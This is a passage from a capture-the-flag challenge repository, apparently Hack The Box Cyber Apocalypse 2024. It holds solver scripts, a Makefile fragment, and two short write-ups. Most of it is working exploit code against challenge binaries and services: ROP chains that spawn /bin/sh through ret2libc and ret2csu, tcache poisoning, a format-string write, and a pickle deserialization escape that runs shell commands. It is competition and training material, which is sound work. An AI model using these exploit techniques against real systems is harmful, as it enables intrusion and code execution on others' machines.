-9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | @find . -name "*.sage.py" -type f -delete 24 | 25 | test: clean default flag solver 26 | 27 | clean: 28 | @rm -rf release/* 29 | @rm -rf htb/output.txt 30 | @find . -name "*.sage.py" -type f -delete 31 | @echo [+] Challenge release deleted successfully. 32 | -------------------------------------------------------------------------------- /misc/[Medium] Colored Squares/htb/solver.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | import string 3 | 4 | flag = BitVecs('v0, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21', 8) 5 | 6 | s = Solver() 7 | 8 | for i in range(len(flag)): 9 | s.add(flag[i] >= 48) 10 | s.add(flag[i] <= 125) 11 | 12 | s.add(flag[0] == ord('H')) 13 | s.add(flag[1] == ord('T')) 14 | s.add(flag[2] == ord('B')) 15 | s.add(flag[3] == ord('{')) 16 | s.add(flag[21] == ord('}')) 17 | 18 | s.add(flag[7] - flag[18] == flag[8] - flag[9]) # 19 | s.add(flag[6] + flag[10] == flag[16] + flag[20] + 12) # 20 | s.add(flag[8] * flag[14] == 2 * flag[18] * flag[13]) # 21 | s.add(flag[19] == flag[6]) # 22 | s.add(flag[9] + 1 == flag[17] - 1) # 23 | s.add(flag[11] == 2 * (flag[5] + 7)) # 24 | s.add(flag[5] + flag[2]/2 == flag[1]) # 25 | s.add(flag[16] - 9 == flag[13] + 4) # 26 | s.add(flag[12] == 17 * 3) # 27 | s.add(flag[4] - flag[5] + flag[12] == flag[14] + 20) # 28 | s.add(flag[12] * flag[15] == 24 * flag[14]) # 29 | s.add(flag[18] + flag[4] == 173) # 30 | s.add(flag[6] == flag[5] + 63) # 31 | s.add(flag[16] * 32 == flag[0] * flag[7]) # 
32 | s.add(flag[17] - flag[15] == flag[18] + 1) # 33 | 34 | # guess that last letter is 's' 35 | s.add(flag[20] == ord('s')) 36 | 37 | if s.check() == sat: 38 | f = '' 39 | m = s.model() 40 | for v in flag: 41 | f += chr(m[v].as_long()) 42 | print(f) 43 | else: 44 | print('fail') 45 | -------------------------------------------------------------------------------- /misc/[Medium] Quantum Conundrum/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Medium] Quantum Conundrum/assets/image.png -------------------------------------------------------------------------------- /misc/[Medium] Quantum Conundrum/htb/solver.py: -------------------------------------------------------------------------------- 1 | import telnetlib 2 | 3 | input = """ 4 | {"type": "hadamard","register_indexes": [1]};{"type": "cnot","register_indexes": [1,2]};{"type": "cnot","register_indexes": [0, 1]};{"type": "hadamard","register_indexes": [0]} 5 | """ 6 | HOST = "127.0.0.1" 7 | PORT = 1337 8 | 9 | tn = telnetlib.Telnet(HOST, PORT) 10 | 11 | print(" > Connected succesfully to server...") 12 | tn.read_until(b"\n>") 13 | print(" > Read garbage...") 14 | tn.write(input.encode()) 15 | print(f" > Sent input: {input}") 16 | tn.read_until((b"\n % Testing quantum circuit, please wait...\n")) 17 | print(" > Read some more garbage...") 18 | flag = tn.read_all() 19 | print(f"> Got flag: {flag.decode()}") -------------------------------------------------------------------------------- /misc/[Medium] Were Pickle Phreaks Revenge/htb/sol.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode, b64decode 2 | from pickora import Compiler 3 | from pwn import * 4 | 5 | def send_payload(payload): 6 | payload = b64encode(compiler.compile(payload)) 7 | io.recvuntil(b'> ') 8 | io.sendline(b'2') 9 | 
io.recvuntil(b': ') 10 | io.sendline(payload) 11 | 12 | def get_flag(): 13 | io.recvuntil(b'> ') 14 | io.sendline(b'1') 15 | io.interactive() 16 | io.recvuntil(b'HTB{') 17 | flag = io.recvuntil(b'}') 18 | return b'HTB{' + flag 19 | 20 | def pwn(): 21 | payload = b'_setattr = GLOBAL("app", "__setattr__");' 22 | payload += b'subclasses = GLOBAL("app", "members.__class__.__base__.__subclasses__")();' 23 | payload += b'_setattr("subclasses", subclasses);' 24 | payload += b'gadget = GLOBAL("app", "subclasses.__getitem__")(133);' 25 | payload += b'_setattr("gadget", gadget);' 26 | payload += b'builtins = GLOBAL("app", "gadget.__init__.__globals__.__getitem__")("__builtins__");' 27 | payload += b'_setattr("builtins", builtins);' 28 | payload += b'eval = GLOBAL("app", "builtins.__getitem__")("eval");' 29 | payload += b'eval(\'__import__("os").system("cat flag.txt")\')' 30 | send_payload(payload) 31 | flag = get_flag() 32 | print(flag) 33 | 34 | if __name__ == '__main__': 35 | ip = '127.0.0.1' 36 | port = 1337 37 | io = remote(ip, port) 38 | #io = process(['python', 'app.py']) 39 | compiler = Compiler() 40 | pwn() 41 | -------------------------------------------------------------------------------- /misc/[Very Easy] Character/README.md: -------------------------------------------------------------------------------- 1 | ![](../../../../../assets/banner.png) 2 | 3 | Character 4 | 5 | ​ 8th March 2024 6 | 7 | ​ Challenge Author: ir0nstone 8 | 9 | 10 | 11 | 12 | 13 | # Synopsis 14 | 15 | Character is a Very Easy misc coding challenge where the remote server prompts you repeatedly for an index of the flag, and when you enter an index it will return the character at that index. 16 | 17 | ## Description 18 | 19 | Security through Induced Boredom is a personal favourite approach of mine. Not as exciting as something like The Fray, but I love making it as tedious as possible to see my secrets, so you can only get one character at a time! 
20 | 21 | ## Skills Required 22 | - Basic programming skills 23 | 24 | ## Skills Learned 25 | - Scripting remote connections 26 | 27 | # Enumeration 28 | 29 | Connecting to the server gives us this prompt: 30 | 31 | ```sh 32 | $ nc <host> <port> 33 | Which character of the flag do you want? Enter an index: 34 | ``` 35 | 36 | If we input `0`, `1`, etc. consecutively, we can see what's happening: 37 | 38 | ``` 39 | Which character of the flag do you want? Enter an index: 0 40 | Character at Index 0: H 41 | Which character of the flag do you want? Enter an index: 1 42 | Character at Index 1: T 43 | Which character of the flag do you want? Enter an index: 2 44 | Character at Index 2: B 45 | ``` 46 | 47 | The first three characters are `HTB`. This is clearly leaking the flag! 48 | 49 | # Solution 50 | 51 | To solve the challenge, we simply have to start at index `0` and increment it, querying the server for every index. We can script this using pwntools. First start a connection: 52 | 53 | ```python 54 | from pwn import * 55 | 56 | p = remote('<host>', <port>) 57 | ``` 58 | 59 | Then we want to create an empty `flag` string to add onto, and an index counter `idx` that starts at `0`: 60 | 61 | ```python 62 | flag = '' 63 | idx = 0 64 | ``` 65 | 66 | Now we'll start an infinite loop, incrementing the index we ask for by `1` every time to grab every index. If the character we get is `}`, we know we've reached the end of the flag. 67 | 68 | ```python 69 | while True: 70 | p.sendlineafter(b'index: ', str(idx).encode()) 71 | p.recvuntil(b': ') 72 | char = p.recvS(1) 73 | 74 | flag += char 75 | idx += 1 76 | 77 | if char == '}': 78 | break 79 | 80 | print(flag) 81 | ``` 82 | 83 | We get the flag! 
-------------------------------------------------------------------------------- /misc/[Very Easy] Character/htb/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = remote('127.0.0.1', 1337) 4 | 5 | flag = '' 6 | idx = 0 7 | while True: 8 | p.sendlineafter(b'index: ', str(idx).encode()) 9 | p.recvuntil(b': ') 10 | char = p.recvS(1) 11 | 12 | flag += char 13 | idx += 1 14 | 15 | if char == '}': 16 | break 17 | 18 | print(flag) 19 | -------------------------------------------------------------------------------- /misc/[Very Easy] Stop Drop and Roll/README.md: -------------------------------------------------------------------------------- 1 | ![](../../../../../assets/banner.png) 2 | 3 | Stop Drop and Roll 4 | 5 | ​ 8th March 2024 6 | 7 | ​ Challenge Author: ir0nstone 8 | 9 | 10 | 11 | 12 | 13 | # Synopsis 14 | 15 | Stop Drop and Roll is a Very Easy misc coding challenge where the remote server sends you scenarios and you must script a response to them. 16 | 17 | ## Description 18 | 19 | The Fray: The Video Game is one of the greatest hits of the last... well, we don't remember quite how long. Our "computers" these days can't run much more than that, and it has a tendency to get repetitive... 20 | 21 | ## Skills Required 22 | - Basic programming skills 23 | 24 | ## Skills Learned 25 | - Scripting remote connections 26 | 27 | # Enumeration 28 | 29 | Connecting to the server gives us this prompt: 30 | 31 | ``` 32 | $ nc localhost 1337 33 | ===== THE FRAY: THE VIDEO GAME ===== 34 | Welcome! 
35 | This video game is very simple 36 | You are a competitor in The Fray, running the GAUNTLET 37 | I will give you one of three scenarios: GORGE, PHREAK or FIRE 38 | You have to tell me if I need to STOP, DROP or ROLL 39 | If I tell you there's a GORGE, you send back STOP 40 | If I tell you there's a PHREAK, you send back DROP 41 | If I tell you there's a FIRE, you send back ROLL 42 | Sometimes, I will send back more than one! Like this: 43 | GORGE, FIRE, PHREAK 44 | In this case, you need to send back STOP-ROLL-DROP! 45 | Are you ready? (y/n) 46 | ``` 47 | 48 | The instructions are pretty clear - we have to take in a list of `GORGE`, `PHREAK` and `FIRE` prompts and return the instructions `STOP`, `DROP` or `ROLL` depending on the prompt. 49 | 50 | # Solution 51 | 52 | We will script this challenge using pwntools. First start a connection: 53 | 54 | ```python 55 | from pwn import * 56 | 57 | p = remote('<host>', <port>) 58 | ``` 59 | 60 | Then we want to send `y` to start the game and receive the response. 61 | 62 | ```python 63 | p.sendlineafter(b'(y/n) ', b'y') 64 | p.recvline() 65 | ``` 66 | 67 | Now we'll start an infinite loop, taking in a line of input. We then want to replace every `, ` with `-`, every `GORGE` with `STOP`, every `PHREAK` with `DROP` and every `FIRE` with `ROLL`. After this, we send it back. 68 | 69 | If the line we receive has no `GORGE`, `PHREAK` or `FIRE`, it's probably returned the flag to us, so we just print out the line and quit the loop. 70 | 71 | ```python 72 | while True: 73 | recv = p.recvlineS().strip() 74 | 75 | if 'GORGE' not in recv and 'PHREAK' not in recv and 'FIRE' not in recv: 76 | print(recv) 77 | break 78 | 79 | result = recv.replace(", ", "-") 80 | result = result.replace("GORGE", "STOP") 81 | result = result.replace("PHREAK", "DROP") 82 | result = result.replace("FIRE", "ROLL") 83 | 84 | p.sendlineafter(b'do? ', result.encode()) 85 | ``` 86 | 87 | Running this against the server, we get the flag! 
-------------------------------------------------------------------------------- /misc/[Very Easy] Stop Drop and Roll/htb/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = remote('127.0.0.1', 1337) 4 | 5 | p.sendlineafter(b'(y/n) ', b'y') 6 | p.recvline() 7 | 8 | while True: 9 | recv = p.recvlineS().strip() 10 | 11 | if 'GORGE' not in recv and 'PHREAK' not in recv and 'FIRE' not in recv: 12 | print(recv) 13 | break 14 | 15 | result = recv.replace(", ", "-") 16 | result = result.replace("GORGE", "STOP") 17 | result = result.replace("PHREAK", "DROP") 18 | result = result.replace("FIRE", "ROLL") 19 | 20 | p.sendlineafter(b'do? ', result.encode()) 21 | -------------------------------------------------------------------------------- /pwn/[Easy] Pet companion/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Pet companion/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Easy] Pet companion/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Pet companion/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Easy] Pet companion/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | fname = './pet_companion' 10 | 11 | LOCAL = False 12 | 13 | os.system('clear') 14 | 15 | if LOCAL: 16 | print('Running solver locally..\n') 17 | r = process(fname) 18 
| else: 19 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 20 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 21 | r = remote(IP, PORT) 22 | print(f'Running solver remotely at {IP}:{PORT}\n') 23 | 24 | e = ELF(fname) 25 | libc = ELF(e.runpath.decode() + 'libc.so.6') 26 | 27 | ''' 28 | Gadget 1: 29 | 0x000000000040073a <+90>: pop rbx 30 | 0x000000000040073b <+91>: pop rbp 31 | 0x000000000040073c <+92>: pop r12 32 | 0x000000000040073e <+94>: pop r13 33 | 0x0000000000400740 <+96>: pop r14 34 | 0x0000000000400742 <+98>: pop r15 35 | 0x0000000000400744 <+100>: ret 36 | 37 | Gadget 2: 38 | 0x0000000000400720 <+64>: mov rdx,r15 39 | 0x0000000000400723 <+67>: mov rsi,r14 40 | 0x0000000000400726 <+70>: mov edi,r13d 41 | 0x0000000000400729 <+73>: call QWORD PTR [r12+rbx*8] 42 | ''' 43 | 44 | # ret2csu to leak libc address 45 | r.sendline(flat({ 46 | 0x48: p64(e.sym.__libc_csu_init + 90) + 47 | p64(0) + p64(1) + p64(e.got.write) + 48 | p64(1) + p64(e.got.write) + p64(8) + 49 | p64(e.sym.__libc_csu_init + 64) + 50 | p64(0) * 7 + p64(e.sym.main) 51 | })) 52 | 53 | # Calculate libc base 54 | libc.address = u64(r.recvline_contains('\x7f')) - libc.sym.write 55 | print(f'Libc base: {libc.address:#04x}') 56 | 57 | # ret2libc 58 | rop = ROP(libc, base=libc.address) 59 | rop.call(rop.ret[0]) 60 | rop.system(next(libc.search(b'/bin/sh\x00'))) 61 | r.sendline(flat({0x48: rop.chain()})) 62 | 63 | # Get flag 64 | pause(1) 65 | r.sendline('cat flag*') 66 | print(f'\nFlag --> {r.recvline_contains(b"HTB").strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Easy] Rocket Blaster XXX/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Rocket Blaster XXX/assets/banner.png -------------------------------------------------------------------------------- 
/pwn/[Easy] Rocket Blaster XXX/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Rocket Blaster XXX/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Easy] Rocket Blaster XXX/assets/inter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Rocket Blaster XXX/assets/inter.png -------------------------------------------------------------------------------- /pwn/[Easy] Rocket Blaster XXX/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | fname = './rocket_blaster_xxx' 10 | 11 | LOCAL = False 12 | 13 | os.system('clear') 14 | 15 | if LOCAL: 16 | print('Running solver locally..\n') 17 | r = process(fname) 18 | else: 19 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 20 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 21 | r = remote(IP, PORT) 22 | print(f'Running solver remotely at {IP} {PORT}\n') 23 | 24 | r.timeout = 0.1 25 | 26 | e = ELF(fname) 27 | rop = ROP(e) 28 | 29 | payload = flat({ 30 | 0x28: p64(rop.find_gadget(['pop rdi'])[0]) + p64(0xdeadbeef) + 31 | p64(rop.find_gadget(['pop rsi'])[0]) + p64(0xdeadbabe) + 32 | p64(rop.find_gadget(['pop rdx'])[0]) + p64(0xdead1337) + 33 | p64(rop.find_gadget(['ret'])[0]) + p64(e.sym.fill_ammo) 34 | }) 35 | 36 | r.sendline(payload) 37 | 38 | r.recvuntil('at: ') 39 | print(f'Flag --> {r.recvline().strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Hard] 
Maze of Mist/assets/symlink.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Hard] Maze of Mist/assets/symlink.png -------------------------------------------------------------------------------- /pwn/[Hard] Maze of Mist/htb/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.binary = './target' 4 | 5 | VDSO_BASE_ADDR = 0xf7ffc000 6 | 7 | MOV_EAX_ECX_PLUS_EBP_M20 = VDSO_BASE_ADDR + 0x67c 8 | POP_EBP = VDSO_BASE_ADDR + 0x0000613 9 | POP_EDX_ECX = VDSO_BASE_ADDR + 0x0000057a 10 | SYSCALL_POP_EBP_EDX_ECX = VDSO_BASE_ADDR + 0x00000577 11 | BINSH = 0xffffdf20 12 | ARGV = BINSH + 8 13 | 14 | payload = flat( 15 | b'A'*0x20, 16 | 17 | POP_EBP, 18 | 0x8048028, 19 | 20 | POP_EDX_ECX, 21 | 0, 22 | 23, 23 | 24 | MOV_EAX_ECX_PLUS_EBP_M20, 25 | b'A'*44, 26 | 0, 27 | b'A'*12, 28 | SYSCALL_POP_EBP_EDX_ECX, 29 | 0x8048028, 30 | 0, 11, 31 | MOV_EAX_ECX_PLUS_EBP_M20, 32 | b'A'*44, 33 | BINSH, 34 | b'A'*12, 35 | 36 | POP_EDX_ECX, 37 | 0, 38 | ARGV, 39 | 40 | SYSCALL_POP_EBP_EDX_ECX, 41 | b'/bin/sh\x00', 42 | BINSH+5, 43 | 0 44 | ) 45 | 46 | print(payload) 47 | -------------------------------------------------------------------------------- /pwn/[Hard] Oracle/htb/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from pwn import * 3 | 4 | IP = args.HOST or "0" 5 | PORT = args.PORT or 9001 6 | 7 | context.binary = './challenge/oracle' 8 | libc = ELF('challenge/libc-2.31.so') 9 | 10 | # create chunks, including buffer chunk 11 | p = remote(IP, PORT) 12 | p.send(b'PLAGUE /huh HTTP/1.1\r\nContent-Length: 200\r\nPlague-Target: test\r\n\r\nf') 13 | p.close() 14 | 15 | # libc leak 16 | p = remote(IP, PORT) 17 | p.send(b'PLAGUE /huh HTTP/1.1\r\nContent-Length: 200\r\nPlague-Target: test\r\n\r\nf') 
18 | 19 | p.recvuntil(b'plague: ') 20 | p.recv(8) # may as well ignore corrupted pointer and take the second 21 | leak = u64(p.recv(8)) 22 | log.success(f'Leak: 0x{leak:x}') 23 | 24 | libc.address = leak - 0x1ecbe0 25 | log.success(f'Libc base: 0x{libc.address:x}') 26 | 27 | p.close() 28 | 29 | # buffer overflow 30 | rop = ROP(libc) 31 | 32 | rop.dup2(6, 0) 33 | rop.dup2(6, 1) 34 | rop.raw(libc.address + 0x22679) 35 | rop.system(next(libc.search(b'/bin/sh\x00'))) 36 | 37 | print(rop.dump()) 38 | 39 | p = remote(IP, PORT) 40 | 41 | 42 | payload = b'PLAGUE /huh HTTP/1.1\r\n' 43 | payload = payload.ljust(1024, b'A') 44 | payload += b'\n' * 0x4e 45 | payload += rop.chain() 46 | payload += b'\r\n\r\nf\r\n' 47 | 48 | p.send(payload) 49 | p.interactive() 50 | -------------------------------------------------------------------------------- /pwn/[Insane] Gloater/assets/initial_run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Insane] Gloater/assets/initial_run.png -------------------------------------------------------------------------------- /pwn/[Insane] Gloater/htb/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('./challenge/gloater') 4 | libc = ELF('./libc-2.31.so') 5 | p = remote('127.0.0.1', 9001) 6 | 7 | def change_user(name): 8 | p.sendlineafter(b'> ', b'1') 9 | p.sendafter(b'New User: ', name) 10 | p.recvuntil(b'Old User was ') 11 | return p.recvuntil(b'...', drop=True) 12 | 13 | def create_taunt(target, description): 14 | p.sendlineafter(b'> ', b'2') 15 | p.sendlineafter(b'target: ', target) 16 | p.sendlineafter(b'Taunt: ', description) 17 | 18 | def remove_taunt(idx): 19 | p.sendlineafter(b'> ', b'3') 20 | p.sendlineafter(b'Index: ', str(idx).encode()) 21 | 22 | def set_super_taunt(idx, description): 23 | 
p.sendlineafter(b'> ', b'5') 24 | p.sendlineafter(b'Taunt: ', str(idx).encode()) 25 | p.sendlineafter(b'taunt: ', description) 26 | 27 | 28 | # send... 29 | p.sendlineafter(b'> ', b'A' * 0x10) # send name 16 bytes 30 | create_taunt(b'yes', b'no') # create a taunt 31 | set_super_taunt(0, b'A'*0x88) # set the super taunt 32 | 33 | p.recvuntil(b'A'*0x88) 34 | leak = u64(p.recv(6) + b'\0\0') 35 | libc.address = leak - libc.sym['puts'] 36 | log.success(f'LIBC Base: 0x{libc.address:x}') 37 | 38 | # libc addr means squat 39 | # because the pointer is never used to edit, just free 40 | # and free is checked 41 | # and tf are you gonna do by freeing an address in libc? 42 | # ohhh actually you could free something? but nah, fully doubt, especially with only 1 name change 43 | 44 | payload = b'A' * 4 45 | payload += b'\x10\x10' # brute 4th-last bit as a `1` 46 | leak = change_user(payload) 47 | leak = leak.split(b'A' * 0x10)[1] 48 | leak += b'\0' * 2 49 | leak = u64(leak) 50 | log.success(f'Leak: 0x{leak:x}') 51 | 52 | # array located at base + 0x40e0 53 | pause() 54 | 55 | # ... now free tcache 56 | remove_taunt(0) 57 | 58 | # fake tcache! 59 | # tcache is size 0x290 60 | # so we need to input 0x280 data 61 | ret_addr = leak - 0x18 62 | log.info(f'Writing to 0x{ret_addr:x}') 63 | 64 | tcache_fake = p16(0) * 12 # pad it out... 65 | tcache_fake += p16(1) # 0xe0 bin... 66 | tcache_fake += p16(0) * (64-12-1) # rest of bins 67 | tcache_fake += p64(0) * 12 # get to nice size 68 | tcache_fake += p64(ret_addr) # overwrite 0xe0 bin...! 69 | tcache_fake = tcache_fake.ljust(0x280-1, b'\x00') # -1 for newline... 70 | 71 | create_taunt(b'dontcare', tcache_fake) # works! 72 | 73 | # now to use arb write? 74 | # have to use the 0xe0 bin! 
75 | rop = ROP(libc) 76 | 77 | rop.raw(libc.address + 0x22679) 78 | rop.system(next(libc.search(b'/bin/sh\0'))) 79 | 80 | payload = rop.chain() 81 | payload = payload.ljust(0xd0, b'A') 82 | 83 | p.sendlineafter(b'> ', b'2') 84 | p.sendlineafter(b'target: ', b'nomatter') 85 | pause() 86 | p.sendlineafter(b'Taunt: ', payload) 87 | 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /pwn/[Medium] Death Note/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Death Note/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Medium] Death Note/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Death Note/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Medium] Death Note/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | prompt = '💀'.encode('utf-8') 10 | 11 | fname = './deathnote' 12 | 13 | LOCAL = False 14 | 15 | os.system('clear') 16 | 17 | if LOCAL: 18 | print('Running solver locally..\n') 19 | r = process(fname) 20 | else: 21 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 22 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 23 | r = remote(IP, PORT) 24 | print(f'Running solver remotely at {IP} {PORT}\n') 25 | 26 | r.timeout = 0.5 27 | 28 | e = ELF(fname) 29 | libc = ELF(e.runpath.decode() + 'libc.so.6') 30 | 31 | rl = lambda : 
r.recvline() 32 | ru = lambda x : r.recvuntil(x) 33 | sla = lambda x,y : r.sendlineafter(x,y) 34 | slap = lambda y : r.sendlineafter(prompt,y) 35 | 36 | def malloc(sz, idx, payload): 37 | slap('1') 38 | slap(str(sz)) 39 | slap(str(idx)) 40 | slap(payload) 41 | 42 | def free(idx): 43 | slap('2') 44 | slap(str(idx)) 45 | 46 | def show(idx): 47 | slap('3') 48 | slap(str(idx)) 49 | 50 | [malloc(0x80, i, 'w3t') for i in range (9)] 51 | 52 | [free(i) for i in range (8)] 53 | 54 | show(7) 55 | 56 | ru('content: ') 57 | 58 | libc.address = u64(rl().strip().ljust(8, b'\x00')) - 0x21ace0 59 | 60 | print(f'Libc base: {libc.address:#04x}\n') 61 | 62 | # Create 2 notes: note[0] = system(), note[1] = "/bin/sh" 63 | malloc(0x20, 0, str(hex(libc.sym.system))) 64 | malloc(0x80, 1, b'/bin/sh\0') 65 | 66 | slap('42') 67 | 68 | r.sendline('') 69 | 70 | pause(1) 71 | r.sendline('cat flag*') 72 | print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Medium] Sound of Silence/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Sound of Silence/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Medium] Sound of Silence/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Sound of Silence/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Medium] Sound of Silence/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | 
warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | fname = './sound_of_silence' 10 | 11 | LOCAL = False 12 | 13 | os.system('clear') 14 | 15 | if LOCAL: 16 | print('Running solver locally..\n') 17 | r = process(fname) 18 | else: 19 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 20 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 21 | r = remote(IP, PORT) 22 | print(f'Running solver remotely at {IP} {PORT}\n') 23 | 24 | e = ELF(fname) 25 | 26 | payload = flat({0x28: p64(e.plt.gets) + p64(e.plt.system)}) 27 | 28 | r.sendlineafter('>> ', payload) 29 | 30 | r.sendline('cat glag*') 31 | 32 | print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}\n') 33 | -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Delulu/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Delulu/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/assets/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Delulu/assets/interface.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/htb/solver.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | LOCAL = False 10 | 11 | os.system('clear') 12 | 13 | if LOCAL: 14 | print('Running solver locally..\n') 15 | r = process('./delulu') 16 | else: 17 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 18 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 19 | r = remote(IP, PORT) 20 | print(f'Running solver remotely at {IP} {PORT}\n') 21 | 22 | 23 | def get_flag(): 24 | pause(1) 25 | r.sendline('cat flag*') 26 | print(f'\nFlag --> {r.recvline_contains(b"HTB").strip().decode()}\n') 27 | 28 | r.sendlineafter('>> ', '%48879x%7$hn') 29 | r.recvuntil('HTB') 30 | print(f'Flag --> HTB{r.recvline().strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Tutorial/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Tutorial/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/assets/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Tutorial/assets/interface.png 
